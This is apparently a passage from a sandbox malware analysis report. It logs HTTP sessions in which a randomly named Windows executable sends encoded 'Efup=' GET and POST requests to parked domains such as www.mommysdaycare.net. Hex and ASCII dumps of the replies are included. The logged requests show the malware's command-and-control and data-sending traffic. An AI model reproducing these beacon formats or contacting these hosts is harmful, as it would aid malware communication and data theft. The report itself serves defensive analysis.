                                Data Raw: 45 66 75 70 3d 74 76 6b 5a 38 77 61 79 2b 63 51 6a 51 56 32 6b 5a 62 35 6e 31 43 43 55 4a 74 59 53 67 55 59 70 34 6b 68 6e 42 74 6c 51 6c 30 39 54 36 6f 5a 33 36 4e 5a 46 61 34 45 2b 76 6e 41 58 74 2b 34 37 47 54 47 66 53 35 68 30 4a 50 50 74 69 59 54 6b 72 78 44 5a 58 5a 78 78 73 41 6c 4d 38 6f 51 72 50 44 6a 30 57 77 77 45 48 6e 38 4d 7a 4d 45 73 55 65 6a 43 33 2f 72 4b 38 79 75 4d 56 6d 33 34 73 77 32 61 35 71 59 70 70 44 56 52 56 71 2f 74 70 69 76 73 59 35 78 53 50 48 6b 61 31 75 53 35 54 55 44 61 76 76 52 33 70 7a 67 75 4f 50 59 4e 6f 65 66 66 59 32 6a 51 42 52 34 66 36 63 61 56 44 6b 44 2f 32 4d 34 47 78 5a 6f 58 69 37 77 47 79 4a 42 39 2f 4e 31 68 4c 4d 34 42 45 34 31 65 42 64 4f 42 52 64 36 6b 5a 4e 5a 75 57 6b 38 30 33 77 54 63 79 4d 44 36 57 2f 58 4c 46 46 45 37 4c 4f 79 73 36 55 46 54 51 49 43 49 6a 62 6a 72 43 2f 6f 58 62 4b 67 74 35 74 43 77 67 4f 2b 78 49 43 56 31 71 44 47 32 41 54 68 4e 58 72 51 36 37 6e 79 75 53 6f 42 39 58 7a 53 61 35 34 4c 47 76 4b 50 70 46 41 34 55 6d 2f 67 51 32 [TRUNCATED]
                                Data Ascii: Efup=tvkZ8way+cQjQV2kZb5n1CCUJtYSgUYp4khnBtlQl09T6oZ36NZFa4E+vnAXt+47GTGfS5h0JPPtiYTkrxDZXZxxsAlM8oQrPDj0WwwEHn8MzMEsUejC3/rK8yuMVm34sw2a5qYppDVRVq/tpivsY5xSPHka1uS5TUDavvR3pzguOPYNoeffY2jQBR4f6caVDkD/2M4GxZoXi7wGyJB9/N1hLM4BE41eBdOBRd6kZNZuWk803wTcyMD6W/XLFFE7LOys6UFTQICIjbjrC/oXbKgt5tCwgO+xICV1qDG2AThNXrQ67nyuSoB9XzSa54LGvKPpFA4Um/gQ2dZhv/qwidTNWyKwGaziQyOcJnOmQX/iDlIh8ZgBA/kIYw684f7ufXeD9ruVhwfl397RbVQGKEupZDkm5OeDM9nmojou22pPmDeywrBdsNHJvkUkDQ5TAaRNBo0aKxIHzL2ooKgTWGbKf48I8x1Jb2gHKntwTCLlRrS9I1E9p7m5YKtR0FSF40krhGQO13gQWd0aGA2TcRmUIsk1dGLaxthvtaOR+EI1EnhLPKCaLBBych+i57mzL/n72Ga51Imedi/OYqNcrZJYjkTogNYuE1qEJ5+gjwlbzsCuUfKfz2yDwT7oicgQtM2RD09qAqlobQZH/Rh5jH+omKjz/lk1g57f6rZ+tpHihmfGvH4m0zTresjiL07nmQ9nndB4SjGRDfDoW9jHTbRcF8rtCzJkYsnUJs8vdf3tp8coB6KphkcbHt/l6ySGsGEtWb2VYPgD0/mti4r+Z1qk/AwhYO0o/ed0DqjgBqANjjZZfQT9OKn8gLrKjVMU1tfPxxhqmpvbKk5fmSnwl3MvGdHIL8DClnVX0U5OUlT2t17KqrCBAcQmC35xnbrezIq3OQIQujWLWDSU/KfDxBNTgT+S9I5RqS/uIXVyO0VWbdzVtBTSWhBUaMbhH4qfln0DD+b53yZHplf12PyzoH3S8QvVlecsE3EisiTjdSMLHVb [TRUNCATED]
                                Jul 3, 2024 18:04:51.669588089 CEST305INHTTP/1.1 405 Not Allowed
                                date: Wed, 03 Jul 2024 16:04:51 GMT
                                content-type: text/html
                                content-length: 154
                                server: Parking/1.0
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.84973864.190.62.22805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:53.513322115 CEST357OUTGET /7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.tutoringservices-jp.space
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:04:54.183583975 CEST1236INHTTP/1.1 200 OK
                                date: Wed, 03 Jul 2024 16:04:54 GMT
                                content-type: text/html; charset=UTF-8
                                transfer-encoding: chunked
                                vary: Accept-Encoding
                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                pragma: no-cache
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GA9MYthFAHapI9ZIibg7eKN4oXL6lkH3GEmn1i8Bwy2SAuvZjSdbf2CI6vXO+c8M1AN+4bMJrnmkhctHZ7VkJw==
                                last-modified: Wed, 03 Jul 2024 16:04:54 GMT
                                x-cache-miss-from: parking-64f5d45c5c-wlphq
                                server: Parking/1.0
                                connection: close
                                Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 47 41 39 4d 59 74 68 46 41 48 61 70 49 39 5a 49 69 62 67 37 65 4b 4e 34 6f 58 4c 36 6c 6b 48 33 47 45 6d 6e 31 69 38 42 77 79 32 53 41 75 76 5a 6a 53 64 62 66 32 43 49 36 76 58 4f 2b 63 38 4d 31 41 4e 2b 34 62 4d 4a 72 6e 6d 6b 68 63 74 48 5a 37 56 6b 4a 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 74 75 74 6f 72 69 6e 67 73 65 72 76 69 63 65 73 2d 6a 70 2e 73 70 61 63 65 26 6e 62 73 70 3b 2d [TRUNCATED]
                                Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GA9MYthFAHapI9ZIibg7eKN4oXL6lkH3GEmn1i8Bwy2SAuvZjSdbf2CI6vXO+c8M1AN+4bMJrnmkhctHZ7VkJw==><head><meta charset="utf-8"><title>tutoringservices-jp.space&nbsp;-&nbsp;tutoringservices jp Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="tutoringservices-jp.space is your first and best sou
                                Jul 3, 2024 18:04:54.183805943 CEST224INData Raw: 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f
                                Data Ascii: rce for all of the information youre looking for. From general topics to more of what you would expect to find here, tutoringservices-jp.space has it allAEC. We hope you find what you are searching for!"><link
                                Jul 3, 2024 18:04:54.183816910 CEST1236INData Raw: 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73
                                Data Ascii: rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:10
                                Jul 3, 2024 18:04:54.184118986 CEST1236INData Raw: 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65
                                Data Ascii: }button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submi
                                Jul 3, 2024 18:04:54.184132099 CEST448INData Raw: 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75
                                Data Ascii: cement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;t
                                Jul 3, 2024 18:04:54.184448004 CEST1236INData Raw: 6f 72 61 74 69 6f 6e 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65
                                Data Ascii: oration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.containe
                                Jul 3, 2024 18:04:54.184459925 CEST1236INData Raw: 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64
                                Data Ascii: e-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.co
                                Jul 3, 2024 18:04:54.184469938 CEST1236INData Raw: 30 25 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65
                                Data Ascii: 0%;border-collapse:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:s
                                Jul 3, 2024 18:04:54.185415983 CEST672INData Raw: 5f 5f 73 6c 69 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64
                                Data Ascii: __slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-co
                                Jul 3, 2024 18:04:54.185430050 CEST1236INData Raw: 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                Data Ascii: etica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relati
                                Jul 3, 2024 18:04:54.188992977 CEST1236INData Raw: 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 2d 33 30 30 70 78 3b 72 69 67 68 74 3a 2d 35 30 70 78 3b 68 65 69 67 68 74 3a 31 33 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74
                                Data Ascii: :scaleX(-1);z-index:-1;top:-300px;right:-50px;height:1300px;position:inherit}.container-content--lp{min-height:920px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-con


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.849739199.59.243.226805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:59.778023005 CEST615OUTPOST /9tym/ HTTP/1.1
                                Host: www.mommysdaycare.net
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.mommysdaycare.net
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.mommysdaycare.net/9tym/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 35 51 58 35 4d 66 37 51 2b 42 64 74 58 6d 4b 65 4a 7a 51 48 41 6c 2b 56 43 46 38 4b 78 35 4d 57 62 31 6b 53 46 4b 54 57 4e 44 54 4f 39 32 77 2b 49 33 45 50 31 59 37 6e 42 4b 31 4f 7a 53 5a 45 42 6c 46 39 78 61 4f 53 54 73 70 57 4c 74 35 78 35 74 75 55 57 2b 72 36 44 50 4d 38 36 61 4a 59 49 4b 53 5a 31 58 7a 7a 56 74 42 78 65 33 38 43 61 32 64 4d 43 68 52 4f 6b 34 4c 51 32 77 63 46 50 43 37 77 77 30 4e 4d 58 52 58 50 4e 39 52 6f 79 53 42 32 74 7a 4a 6d 56 4f 34 66 35 2b 58 4a 6d 44 51 66 30 65 4c 6c 42 35 43 55 42 78 2f 31 43 4b 5a 6a 57 54 4c 41 4d 73 70 6d 4f 69 38 77 35 54 53 4d 4e 70 63 3d
                                Data Ascii: Efup=5QX5Mf7Q+BdtXmKeJzQHAl+VCF8Kx5MWb1kSFKTWNDTO92w+I3EP1Y7nBK1OzSZEBlF9xaOSTspWLt5x5tuUW+r6DPM86aJYIKSZ1XzzVtBxe38Ca2dMChROk4LQ2wcFPC7ww0NMXRXPN9RoySB2tzJmVO4f5+XJmDQf0eLlB5CUBx/1CKZjWTLAMspmOi8w5TSMNpc=
                                Jul 3, 2024 18:05:00.410116911 CEST1236INHTTP/1.1 200 OK
                                date: Wed, 03 Jul 2024 16:04:59 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1134
                                x-request-id: 79bfa620-ea44-414c-8dc8-3c6901b81b91
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==
                                set-cookie: parking_session=79bfa620-ea44-414c-8dc8-3c6901b81b91; expires=Wed, 03 Jul 2024 16:20:00 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 48 30 6d 70 50 30 30 56 68 32 6b 55 43 35 59 4d 49 38 62 64 39 2b 2b 75 64 69 4c 70 50 39 4b 44 57 44 52 6d 6b 73 74 68 59 4a 70 4d 38 74 5a 41 2b 55 68 51 43 6b 57 72 67 6c 31 51 44 58 4c 37 65 48 51 34 61 69 32 4e 4e 4a 42 34 36 72 35 68 75 77 5a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Jul 3, 2024 18:05:00.410136938 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzliZmE2MjAtZWE0NC00MTRjLThkYzgtM2M2OTAxYjgxYjkxIiwicGFnZV90aW1lIjoxNzIwMDIyNz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.849740199.59.243.226805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:02.311620951 CEST635OUTPOST /9tym/ HTTP/1.1
                                Host: www.mommysdaycare.net
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.mommysdaycare.net
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.mommysdaycare.net/9tym/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 35 51 58 35 4d 66 37 51 2b 42 64 74 58 46 53 65 5a 6b 4d 48 49 6c 2b 61 4f 6c 38 4b 34 5a 4d 61 62 31 59 53 46 4c 48 47 4f 32 44 4f 39 55 6f 2b 4a 32 45 50 32 59 37 6e 47 36 31 4c 2b 79 5a 44 42 6c 42 66 78 59 4b 53 54 6f 35 57 4c 76 52 78 34 61 79 62 51 75 72 30 4b 76 4d 36 30 36 4a 59 49 4b 53 5a 31 58 6e 56 56 74 4a 78 65 6e 73 43 5a 54 39 4c 4b 42 52 50 79 49 4c 51 6e 67 63 37 50 43 36 6a 77 32 35 71 58 54 76 50 4e 35 64 6f 7a 48 74 31 32 44 49 74 4b 2b 35 33 78 2f 75 48 6b 78 67 39 6f 49 69 4b 4c 4b 65 70 41 48 53 66 59 6f 52 6c 56 54 6a 72 4d 76 42 51 4c 56 68 59 6a 77 43 38 54 2b 4a 61 6b 4e 4f 38 46 6e 57 76 71 53 48 35 65 42 48 45 77 78 35 39
                                Data Ascii: Efup=5QX5Mf7Q+BdtXFSeZkMHIl+aOl8K4ZMab1YSFLHGO2DO9Uo+J2EP2Y7nG61L+yZDBlBfxYKSTo5WLvRx4aybQur0KvM606JYIKSZ1XnVVtJxensCZT9LKBRPyILQngc7PC6jw25qXTvPN5dozHt12DItK+53x/uHkxg9oIiKLKepAHSfYoRlVTjrMvBQLVhYjwC8T+JakNO8FnWvqSH5eBHEwx59
                                Jul 3, 2024 18:05:02.789774895 CEST1236INHTTP/1.1 200 OK
                                date: Wed, 03 Jul 2024 16:05:02 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1134
                                x-request-id: a9ecc072-dedc-4386-aadb-b4f1026a8606
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==
                                set-cookie: parking_session=a9ecc072-dedc-4386-aadb-b4f1026a8606; expires=Wed, 03 Jul 2024 16:20:02 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 48 30 6d 70 50 30 30 56 68 32 6b 55 43 35 59 4d 49 38 62 64 39 2b 2b 75 64 69 4c 70 50 39 4b 44 57 44 52 6d 6b 73 74 68 59 4a 70 4d 38 74 5a 41 2b 55 68 51 43 6b 57 72 67 6c 31 51 44 58 4c 37 65 48 51 34 61 69 32 4e 4e 4a 42 34 36 72 35 68 75 77 5a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Jul 3, 2024 18:05:02.789808035 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTllY2MwNzItZGVkYy00Mzg2LWFhZGItYjRmMTAyNmE4NjA2IiwicGFnZV90aW1lIjoxNzIwMDIyNz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.849741199.59.243.226805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:04.840353966 CEST1652OUTPOST /9tym/ HTTP/1.1
                                Host: www.mommysdaycare.net
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.mommysdaycare.net
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.mommysdaycare.net/9tym/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
